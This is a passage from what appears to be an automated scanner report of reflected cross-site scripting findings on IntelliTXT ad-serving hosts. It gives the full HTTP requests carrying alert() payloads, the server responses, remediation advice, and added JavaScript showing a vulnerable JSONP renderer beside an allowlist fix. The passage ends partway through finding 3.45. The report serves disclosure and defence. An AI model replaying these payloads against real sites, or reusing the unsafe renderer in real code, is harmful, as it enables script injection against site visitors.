This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with issue 3.35, the // in this payload comments out the closing }catch(e){} of the single-line wrapper, so the 63-byte response below is a syntax error as shown; the reflection is nonetheless unescaped, and a payload that keeps the statement syntactically complete would execute.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If the callback name has to come from the request, validate it against a strict allowlist (a dotted chain of JavaScript identifiers, with a length cap), fall back to a fixed default name when validation fails, and serve the response with a script MIME type and X-Content-Type-Options: nosniff.

Request

GET /v4/context?ts=1298042937129&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&sid=4ccbd227c914fe0ad20c83f2c32d6d2d&pvu=221E92B9864D44419082D8D9A665E825&pvm=91e816d4e263650ab854db91045f7b68&ipid=26006&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=63528&jsoncl=26447&ppc=-1&hn=144&chunkkey=26006:4ccbd227c914fe0ad20c83f2c32d6d2d:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A1%2Cc%3A%22Intranet%20Journal's%20new%20discussion%20forum%20lets%20you%20ask%20for%20opinions%2C%20get%20answers%20to%20questions%2C%20and%20discuss%20Intranet%20Journal%20articles.%20%5B%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A2%2Cc%3A%22Online%20pests%20can%20range%20from%20the%20annoying%20to%20the%20downright%20dangerous.%20This%20Intranet%20Journal%20guide%20takes%20a%20step-by-step%20approach%20to%20diagnosing%2C%20removing%20and%20preventing%20spyware%20infestations.%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A3%2Cc%3A%22For%20six%20months%20in%202004%2C%20Intranet%20Journal's%20Peter%20Zeidman%20published%20a%20tutorial%20on%20using%20the%20PHP%20programming%20language%20to%20build%20a%20content%20management%20system%20(CMS).%22%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A4%2Cc%3A%22We've%20developed%20a%20knowledge%20base%20from%20Intranet%20Journal%20articles%20to%20help%20our%20readers%20find%20the%20answer%20to%20common%20questions.%20When%20used%20with%20the%20Intranet%20Journal%20Discussion%20Forum%2C%20our%20How%20Do%20I...%20section%20harnesses%20the%20experience%20of%20Intranet%20Journal%20reader&chunk=0&total=29&jscallback=$iTXT.js.callback1f6fe4%3balert(1)//4bff4cebd35 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:28:55 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1f6fe4;alert(1)//4bff4cebd35();}catch(e){}

3.39. http://intranetjournal.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2fcb1%3balert(1)//84127e4a12 was submitted in the jscallback parameter. This input was echoed as 2fcb1;alert(1)//84127e4a12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with issue 3.35, the // in this payload comments out the closing }catch(e){} at the end of the single-line wrapper; since the callback sits at the tail of the 6789-byte init script, the whole script fails to parse and none of it runs, so the payload as shown breaks the page's IntelliTXT integration rather than popping an alert. The reflection is nonetheless unescaped, and a payload that keeps the statement syntactically complete would execute.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If the callback name has to come from the request, validate it against a strict allowlist (a dotted chain of JavaScript identifiers, with a length cap), fall back to a fixed default name when validation fails, and serve the response with a script MIME type and X-Content-Type-Options: nosniff.

Request

GET /v4/init?ts=1298042935593&pagecl=63528&fv=10&muid=&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&ipid=26006&jscallback=$iTXT.js.callback02fcb1%3balert(1)//84127e4a12 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:29:23 GMT
Age: 0
Connection: keep-alive
Content-Length: 6789

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback02fcb1;alert(1)//84127e4a12({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
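
Added example (not code from the report or from IntelliTXT): a Node.js JSONP responder in the shape of /al.asp, /v4/advert, /v4/context and /v4/init (issues 3.35, 3.37, 3.38 and 3.39), first reproducing the raw jscallback reflection and then replacing it with an allowlist of dotted identifiers, plus a parse check that confirms the caveat noted under those issues: the scanner's //-terminated payload leaves a script that does not parse. The handler shape and the fallback name are assumptions; the callback names are taken from the requests and responses above.

```javascript
// Added example, not code from the original report or from IntelliTXT: a JSONP
// responder in the shape of /al.asp, /v4/advert, /v4/context and /v4/init,
// first reflecting jscallback raw (as in issues 3.35, 3.37, 3.38 and 3.39) and
// then validating it against an allowlist of dotted identifiers. The handler
// shape and the fallback name are assumptions; the callback values are the
// scanner's payloads and the legitimate names taken from the report.

// A callback may only be a dotted chain of JavaScript identifiers such as
// $iTXT.js.callback31. Quotes, semicolons, comments, brackets, whitespace and
// parentheses cannot pass, so the name can only ever be called, never
// extended with a second statement.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
const DEFAULT_CALLBACK = '$iTXT.js.callback0';  // assumed fallback name
const MAX_CALLBACK_LEN = 128;

function isSafeCallback(name) {
  return typeof name === 'string' &&
    name.length <= MAX_CALLBACK_LEN &&
    CALLBACK_RE.test(name);
}

// Vulnerable: what the report's responses show, callback spliced in raw.
function renderJsonpVulnerable(callback, argJson) {
  return 'try{' + callback + '(' + argJson + ');}catch(e){}';
}

// Hardened: allowlist the callback name and emit the argument through a JSON
// encoder, with <, > and the U+2028/U+2029 line terminators escaped as \uXXXX
// so the argument side cannot break out of the call either.
function renderJsonpHardened(callback, argObj) {
  const cb = isSafeCallback(callback) ? callback : DEFAULT_CALLBACK;
  const arg = argObj === undefined ? '' : JSON.stringify(argObj)
    .replace(/[<>\u2028\u2029]/g,
      (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
  return 'try{' + cb + '(' + arg + ');}catch(e){}';
}

// Response headers for the hardened endpoint: a script MIME type with a
// charset, and no content sniffing.
function jsonpHeaders() {
  return {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
    'Cache-Control': 'private, no-store',
  };
}

// Does the emitted script parse at all? Compiles it without running it.
function parses(src) {
  try { new Function(src); return true; } catch (e) { return false; }
}

// Scanner payloads from the report, URL-decoded as the server receives them,
// and the argument object /v4/init passes to its callback.
const PAYLOAD_335 = '$iTXT.js.callback319eced;alert(1)//957d74fd0a9';
const PAYLOAD_339 = '$iTXT.js.callback02fcb1;alert(1)//84127e4a12';
const INIT_ARG = { requiresContextualization: 0, requiresAdverts: 1 };
```

Feeding PAYLOAD_335 through the vulnerable renderer reproduces the 3.35 response body byte for byte, and parses() reports it as a syntax error: the // has eaten the }catch(e){}. The hardened renderer swaps the rejected name for the default and the output is a clean try/catch around a call that the scanner's payload cannot influence. Validating the name rather than encoding it is deliberate: a callback is code, not data, so there is no encoding that makes an arbitrary string safe in that position.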

3.40. http://intranetjournal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://intranetjournal.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19a56"-alert(1)-"0cbe1950df3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. One caveat: the reflection lands in the property-name position of the object literal passed to $iTXT.glob.dbgParams.set({...}), and "19a56"-alert(1)-"0cbe1950df3":"1" is a syntax error there rather than an expression, so the script as shown does not run at all. The parameter name is still embedded without any escaping, which is what the confidence rating rests on; confirm execution manually with a payload shaped for a property-key position.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Debug parameters copied from the request should be serialised with a JSON encoder, which quotes and escapes every key and value, rather than templated into the object literal; better still, reflect only a fixed set of known parameter names and drop unknown ones.

Request

GET /v4/init?ts=1298042935593&pagecl=63528&fv=10&muid=&refurl=http%3A%2F%2Fwww.intranetjournal.com%2F%3Fc5d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E177b53bcb4%3D1&ipid=26006&jscallback=$iTXT.js.callback0&19a56"-alert(1)-"0cbe1950df3=1 HTTP/1.1
Host: intranetjournal.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.intranetjournal.com/?c5d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E177b53bcb4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wgAAAEuOWI7hwA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:29:28 GMT
Age: 0
Connection: keep-alive
Content-Length: 6772

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
|undefined==$iTXT.glob.dbgParams){$iTXT.glob.dbgParams=new $iTXT.data.Param($iTXT.glob.dbParams,undefined,undefined,'DEBUG');}$iTXT.glob.dbgParams.set({"pagecl":"63528","fv":"10","ts":"1298042935593","19a56"-alert(1)-"0cbe1950df3":"1","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","
...[SNIP]...

3.41. http://isp-planet.us.intellitxt.com/al.asp [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8144e%3balert(1)//c0aabcee0cf was submitted in the jscallback parameter. This input was echoed as 8144e;alert(1)//c0aabcee0cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As echoed, though, the payload does not run: the whole response is one line, so the // comment swallows the closing ();}catch(e){} and leaves the try block unterminated, which is a syntax error. The sink is still unescaped; whatever survives the server's URL decoding is pasted into the script verbatim. Note also that the body is served as text/javascript: injected code runs in the origin of whichever page includes al.asp as a script, and becomes XSS on this host only if a browser navigates to the URL directly and sniffs the response as HTML.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110218124834&adid=0%2C373510%2C0%2C0%2C373510%2C373510&cc=us&di=30028492%2C29977856%2C30069772%2C30028503%2C29977871%2C29977857&hk=1&ipid=26025&mh=9e64e9ea6ebafdfc983d191cb3c49a05&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=a214e9824c8aacf40b30520ffa06754c&pvu=CC42539E2EFA4A5E8A9F4A7DDC7AEA6C&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=316%2C479%3B688%2C595%3B207%2C767%3B537%2C1142%3B852%2C1274%3B546%2C1590%3B&prf=ll%3A1886%7Cintl%3A3584%7Cpreprochrome%3A40%7Cgetconchrome%3A110%7Cadvint%3A3735%7Cadvl%3A3735%7Ctl%3A3943&jscallback=$iTXT.js.callback18144e%3balert(1)//c0aabcee0cf HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 12:51:16 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Fri, 18 Feb 2011 12:51:16 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback18144e;alert(1)//c0aabcee0cf();}catch(e){}
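
The jscallback sink above, and the same sink in the /v4/context and /v4/init findings on this host, is the classic JSONP pattern: the callback name is pasted into the script verbatim. The block below is an added example, not code from intellitxt or from this report. It shows a responder that allowlists the callback name before building the same try{...}catch(e){} wrapper al.asp uses, plus the headers that keep a direct navigation to the endpoint from being rendered as HTML. The URL is a shortened copy of the request in 3.41; the regex, the function names and the header set are this example's own choices.

```javascript
// Added example, not intellitxt code: allowlisting a JSONP callback name.
// REPORT_URL is a shortened copy of the request in finding 3.41; everything
// else (regex, headers, function names) is this example's own.

// A callback may only be a dotted chain of JavaScript identifiers such as
// "$iTXT.js.callback1". ';', '(', '/', quotes and whitespace all fail.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isValidCallback(name) {
  return typeof name === 'string' && name.length <= 100 && CALLBACK_RE.test(name);
}

// What the server sees once the query string is decoded: %3b is already ';'.
function callbackFromUrl(url) {
  return new URL(url).searchParams.get('jscallback');
}

// The vulnerable shape: the raw parameter concatenated into the script.
function renderJsonpUnsafe(callback, data) {
  return 'try{' + callback + '(' + JSON.stringify(data) + ');}catch(e){}';
}

// Hardened: refuse anything outside the allowlist without echoing it, and send
// headers that keep a direct navigation to the endpoint from being rendered as
// HTML. <script src> includes are not affected by Content-Disposition.
function renderJsonpSafe(callback, data) {
  const headers = {
    'Content-Type': 'application/javascript; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
    'Content-Disposition': 'attachment; filename="callback.js"',
  };
  if (!isValidCallback(callback)) {
    return { status: 400, headers, body: '/* invalid jscallback */' };
  }
  const body = 'try{' + callback + '(' + JSON.stringify(data) + ');}catch(e){}';
  return { status: 200, headers, body };
}

// Demonstration harness: run a rendered body against stub globals and record
// whether it parsed and what it called. new Function() is the sink at issue,
// so this belongs in a test, never in the responder itself.
function executeWithStubs(body) {
  const calls = [];
  const $iTXT = { js: { callback1: (d) => calls.push(['callback1', d]) } };
  const alert = (x) => calls.push(['alert', x]);
  try {
    new Function('$iTXT', 'alert', body)($iTXT, alert);
    return { parsed: true, calls };
  } catch (e) {
    return { parsed: !(e instanceof SyntaxError), calls, error: e.name };
  }
}

const REPORT_URL =
  'http://isp-planet.us.intellitxt.com/al.asp?ts=20110218124834&ipid=26025' +
  '&jscallback=$iTXT.js.callback18144e%3balert(1)//c0aabcee0cf';
```

The allowlist still admits any plain global name, which is inherent to JSONP: a permitted callback can only invoke a function with the response data as its single argument, so the data returned this way must be something the including page is allowed to read anyway.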

3.42. http://isp-planet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbfda'-alert(1)-'069187f932f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. This payload parses: 'ipid=26025&fbfda'-alert(1)-'069187f932f=1' is a subtraction expression, so alert(1) runs as soon as the script is loaded. The sink is the raw query string assigned to $iTXT.js.pageQuery, so parameter values reach it as well as names.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=26025&fbfda'-alert(1)-'069187f932f=1 HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AAGxQQ1Wo0RyjESJ/pnB21EAADqvAAA66wEAAAEuOM+wMgA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Tue, 19-Apr-2011 12:47:38 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=AJAg5HHA0kpbvkwgdllNuSgAADqvAAA66wEAAAEuOM+wMgA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 12:47:38 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 12:47:38 GMT
Age: 0
Connection: keep-alive
Content-Length: 10600

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218124738";})();$iTXT.js.serverUrl='http://isp-planet.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26025&fbfda'-alert(1)-'069187f932f=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.43. http://isp-planet.us.intellitxt.com/v4/context [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a4ad6%3balert(1)//1ae24b5acbe was submitted in the jscallback parameter. This input was echoed as a4ad6;alert(1)//1ae24b5acbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The payload as echoed does not execute, however: the body is a single line, so everything after // up to and including }catch(e){} is commented out and the try block is never closed, a syntax error. The parameter is still pasted into the script without encoding. Because the body is application/x-javascript, code injected here runs in the origin of the page that includes /v4/context as a script, and becomes XSS on this host only through a direct navigation that the browser renders as HTML.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1298042884118&refurl=http%3A%2F%2Fwww.isp-planet.com%2Fabout%2Fsitemap.html%3Ffd8e5--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ed97a1fbd30c%3D1&sid=38ce1acdaee97bceafab0c5291679b09&pvu=B988269E926D4B129A1A142EE87DC5DB&pvm=e624adf16f3feadf574c1742b8fd1efa&ipid=26025&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=33114&jsoncl=127&ppc=-1&hn=1&chunkkey=26025:38ce1acdaee97bceafab0c5291679b09:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A1%2Cc%3A%22Copyright%202011%20QuinStreet%20Inc.%20All%20Rights%20Reserved.%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D&chunk=0&total=1&jscallback=$iTXT.js.callback1a4ad6%3balert(1)//1ae24b5acbe HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/about/sitemap.html?fd8e5--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed97a1fbd30c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wcAAAEuOWEglgA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:28:03 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1a4ad6;alert(1)//1ae24b5acbe();}catch(e){}

3.44. http://isp-planet.us.intellitxt.com/v4/init [jscallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 91045%3balert(1)//4c6e467d525 was submitted in the jscallback parameter. This input was echoed as 91045;alert(1)//4c6e467d525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As echoed, the payload is a syntax error rather than a working script: the response puts the whole try{...}catch(e){} wrapper on one line, so the // comment runs to the end of the body and swallows the closing }catch(e){}. The jscallback value still reaches the script with no encoding at all, and since the body is served as application/x-javascript it is script in whichever page includes it and HTML only if a browser sniffs a direct navigation as such.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298033312458&pagecl=38124&fv=10&muid=&refurl=http%3A%2F%2Fwww.isp-planet.com%2F&ipid=26025&jscallback=$iTXT.js.callback091045%3balert(1)//4c6e467d525 HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wIAAAEuOM+rkQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 12:51:03 GMT
Age: 0
Connection: keep-alive
Content-Length: 17207

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback091045;alert(1)//4c6e467d525({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.45. http://isp-planet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://isp-planet.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfdeb"-alert(1)-"613a5e49d69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflection is a property name in the object literal passed to $iTXT.glob.dbgParams.set({...}); "cfdeb"-alert(1)-"613a5e49d69" is not a valid key there, so the response as shown fails to parse and this payload does not execute. The finding itself holds, since the parameter name is written into the literal unescaped; the scanner's payload is simply the wrong shape for a key position.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298033312458&pagecl=38124&fv=10&muid=&refurl=http%3A%2F%2Fwww.isp-planet.com%2F&ipid=26025&jscallback=$iTXT.js.callback0&cfdeb"-alert(1)-"613a5e49d69=1 HTTP/1.1
Host: isp-planet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.isp-planet.com/
